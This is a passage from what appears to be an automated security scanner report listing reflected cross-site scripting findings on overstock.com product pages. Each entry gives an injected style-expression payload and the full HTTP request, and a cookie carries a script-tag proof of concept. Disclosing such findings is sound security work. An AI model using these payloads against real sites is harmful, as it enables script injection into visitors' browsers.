GET /Home-Garden/Serta-8-inch-Queen-size-Memory-Foam-Mattress-and-Cover-Set/4107277/product.html?f9bd8"style%3d"x%3aexpression(alert(1))"88c65efcc58=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.350. http://www.overstock.com/Home-Garden/Serta-Alleene-King-size-Plush-Mattress-Set/3879197/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 394ba"style%3d"x%3aexpression(alert(1))"35335104782 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 394ba"style="x:expression(alert(1))"35335104782 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Serta-Alleene-King-size-Plush-Mattress-Set/3879197/product.html?394ba"style%3d"x%3aexpression(alert(1))"35335104782=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.351. http://www.overstock.com/Home-Garden/Serta-Alleene-Queen-size-Plush-Mattress-Set/3879196/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42c0a"style%3d"x%3aexpression(alert(1))"1fd02119b4c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 42c0a"style="x:expression(alert(1))"1fd02119b4c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Serta-Alleene-Queen-size-Plush-Mattress-Set/3879196/product.html?42c0a"style%3d"x%3aexpression(alert(1))"1fd02119b4c=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.352. http://www.overstock.com/Home-Garden/Serta-Deluxe-2-inch-Memory-Foam-Mattress-Topper/1080221/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8daba"style%3d"x%3aexpression(alert(1))"be065213e49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8daba"style="x:expression(alert(1))"be065213e49 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Serta-Deluxe-2-inch-Memory-Foam-Mattress-Topper/1080221/product.html?8daba"style%3d"x%3aexpression(alert(1))"be065213e49=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.353. http://www.overstock.com/Home-Garden/Serta-Memory-Foam-Contour-Pillows-Set-of-2/1659830/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ac77"style%3d"x%3aexpression(alert(1))"fbafffc9da5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9ac77"style="x:expression(alert(1))"fbafffc9da5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Serta-Memory-Foam-Contour-Pillows-Set-of-2/1659830/product.html?9ac77"style%3d"x%3aexpression(alert(1))"fbafffc9da5=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.354. http://www.overstock.com/Home-Garden/Serta-Rejuvenator-4-inch-Memory-Foam-Mattress-Topper/3298223/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8afe9"style%3d"x%3aexpression(alert(1))"d72ff0de5e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8afe9"style="x:expression(alert(1))"d72ff0de5e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Serta-Rejuvenator-4-inch-Memory-Foam-Mattress-Topper/3298223/product.html?8afe9"style%3d"x%3aexpression(alert(1))"d72ff0de5e9=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.355. http://www.overstock.com/Home-Garden/Serta-Ultimate-4-inch-Memory-Foam-Mattress-Topper/1657609/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3cdc"style%3d"x%3aexpression(alert(1))"c612afe1a89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e3cdc"style="x:expression(alert(1))"c612afe1a89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Serta-Ultimate-4-inch-Memory-Foam-Mattress-Topper/1657609/product.html?e3cdc"style%3d"x%3aexpression(alert(1))"c612afe1a89=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.356. http://www.overstock.com/Home-Garden/Siberian-White-Down-500-Thread-Count-Pillow/3508201/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3146"style%3d"x%3aexpression(alert(1))"11c6c1d77a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f3146"style="x:expression(alert(1))"11c6c1d77a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Siberian-White-Down-500-Thread-Count-Pillow/3508201/product.html?f3146"style%3d"x%3aexpression(alert(1))"11c6c1d77a7=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.357. http://www.overstock.com/Home-Garden/Simple-Queen-size-Cordovan-Platform-Bed/4089587/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67912"style%3d"x%3aexpression(alert(1))"5db12876dee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 67912"style="x:expression(alert(1))"5db12876dee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Simple-Queen-size-Cordovan-Platform-Bed/4089587/product.html?67912"style%3d"x%3aexpression(alert(1))"5db12876dee=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.358. http://www.overstock.com/Home-Garden/Simple-Twin-size-Cordovan-Platform-Bed/4089576/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9c43"style%3d"x%3aexpression(alert(1))"3d9255c315b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b9c43"style="x:expression(alert(1))"3d9255c315b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Simple-Twin-size-Cordovan-Platform-Bed/4089576/product.html?b9c43"style%3d"x%3aexpression(alert(1))"3d9255c315b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.359. http://www.overstock.com/Home-Garden/Slumber-Solutions-Highloft-Supreme-3-inch-Memory-Foam-Topper/4756887/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eacd1"style%3d"x%3aexpression(alert(1))"db8a0a3a0e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eacd1"style="x:expression(alert(1))"db8a0a3a0e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Slumber-Solutions-Highloft-Supreme-3-inch-Memory-Foam-Topper/4756887/product.html?eacd1"style%3d"x%3aexpression(alert(1))"db8a0a3a0e7=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.360. http://www.overstock.com/Home-Garden/Slumber-Solutions-Highloft-Supreme-4-inch-Memory-Foam-Mattress-Topper/4756893/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd3b3"style%3d"x%3aexpression(alert(1))"fee242de61f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fd3b3"style="x:expression(alert(1))"fee242de61f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Slumber-Solutions-Highloft-Supreme-4-inch-Memory-Foam-Mattress-Topper/4756893/product.html?fd3b3"style%3d"x%3aexpression(alert(1))"fee242de61f=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6b2d"style%3d"x%3aexpression(alert(1))"315c4444bbe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a6b2d"style="x:expression(alert(1))"315c4444bbe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Soho-Queen-size-Bed/4233667/product.html?a6b2d"style%3d"x%3aexpression(alert(1))"315c4444bbe=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.362. http://www.overstock.com/Home-Garden/Solid-Wood-52-inch-TV-Console/4493940/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 390a8"style%3d"x%3aexpression(alert(1))"521ee13d9d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 390a8"style="x:expression(alert(1))"521ee13d9d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Solid-Wood-52-inch-TV-Console/4493940/product.html?390a8"style%3d"x%3aexpression(alert(1))"521ee13d9d7=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95fcd"style%3d"x%3aexpression(alert(1))"8af82f37e6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95fcd"style="x:expression(alert(1))"8af82f37e6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
